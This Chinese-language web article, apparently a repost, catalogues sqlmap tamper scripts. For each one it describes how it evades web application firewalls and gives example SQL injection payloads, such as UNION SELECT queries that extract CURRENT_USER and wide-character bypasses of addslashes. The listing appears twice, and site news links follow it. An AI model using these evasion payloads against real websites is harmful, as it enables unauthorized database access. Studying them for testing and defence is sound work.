Sqlmap Tamper大全(3)
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL 注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。 在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。
本文是Sqlmap Tamper大全的最后一章,想阅读前两章的同学,可以点这里: http://www.vm888.com/Article/201312/263564.html
脚本名:sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
Example:
Requirement:
* MSSQL
———————————————————————————
脚本名:chardoubleencode.py 双url编码(不处理以编码的)
Example:
脚本名:unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
Example:
Requirement:
all
——————————————————————————-
脚本名:charencode.py
作用:url编码
Example:
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
· Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
· The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
————————————————————
脚本名:randomcase.py
作用:随机大小写
Example:
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
———————————————————————-
脚本名:unmagicquotes.py
作用:宽字符绕过 GPC addslashes
Example:
Notes:
· Useful for bypassing magic_quotes/addslashes feature
——————————————————————————–
脚本名:randomcomments.py
作用:用/**/分割sql关键字
Example:
————————————————————————
脚本名:versionedkeywords.py
作用:Encloses each non-function keyword with versioned MySQL comment
Example:
Requirement:
* MySQL
—————————————————————————-
脚本名:charunicodeencode.py
作用:字符串 unicode 编码
Example:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
· Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
—————————————————————————-
脚本名:securesphere.py
作用:追加特制的字符串
Example:
Tested against:
all
—————————————————————————-
脚本名:versionedmorekeywords.py
作用:注释绕过
Example:
* MySQL >= 5.1.13
—————————————————————————-
脚本名:space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/**/’
Example:
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
· Useful to bypass weak and bespoke web application firewalls
—————————————————————————-
脚本名:halfversionedmorekeywords.py
作用:关键字前加注释
Example:
Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
—————————————————————————-
via@凌霄飞龙 首发91ri.org
本文是Sqlmap Tamper大全的最后一章,想阅读前两章的同学,可以点这里: http://www.vm888.com/Article/201312/263564.html
脚本名:sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
Example:
('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp_password'
Requirement:
* MSSQL
———————————————————————————
脚本名:chardoubleencode.py 双url编码(不处理以编码的)
Example:
* Input: SELECT FIELD FROM%20TABLE* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
脚本名:unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
Example:
('-1 UNION ALL SELECT')'-1 UNION SELECT'
Requirement:
all
——————————————————————————-
脚本名:charencode.py
作用:url编码
Example:
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
· Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
· The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
————————————————————
脚本名:randomcase.py
作用:随机大小写
Example:
* Input: INSERT | ||
* Output: InsERt |
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
———————————————————————-
脚本名:unmagicquotes.py
作用:宽字符绕过 GPC addslashes
Example:
* Input: 1′ AND 1=1 | ||
* Output: 1%bf%27 AND 1=1–%20 |
· Useful for bypassing magic_quotes/addslashes feature
——————————————————————————–
脚本名:randomcomments.py
作用:用/**/分割sql关键字
Example:
‘INSERT’ becomes ‘IN//S//ERT’ |
脚本名:versionedkeywords.py
作用:Encloses each non-function keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Requirement:
* MySQL
—————————————————————————-
脚本名:charunicodeencode.py
作用:字符串 unicode 编码
Example:
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
· Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
—————————————————————————-
脚本名:securesphere.py
作用:追加特制的字符串
Example:
('1 AND 1=1') | ||
"1 AND 1=1 and '0having'='0having'" |
all
—————————————————————————-
脚本名:versionedmorekeywords.py
作用:注释绕过
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Requirement: |
—————————————————————————-
脚本名:space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/**/’
Example:
* Input: SELECT id FROM users | ||
* Output: SELECT//id//FROM/**/users |
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
· Useful to bypass weak and bespoke web application firewalls
—————————————————————————-
脚本名:halfversionedmorekeywords.py
作用:关键字前加注释
Example:
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa | ||
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa | ||
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
—————————————————————————-
via@凌霄飞龙 首发91ri.org
>更多相关文章
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 12-05亚马逊推出新一代基础模型 任意模态生成大模
- 12-05OpenAI拓展欧洲业务 将在苏黎世设立办公室
- 12-05微软质疑美国联邦贸易委员会泄露信息 督促其
- 12-05联交所取消宝宝树上市地位 宝宝树:不会对公
- 12-04企业微信致歉:文档打开异常已完成修复
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御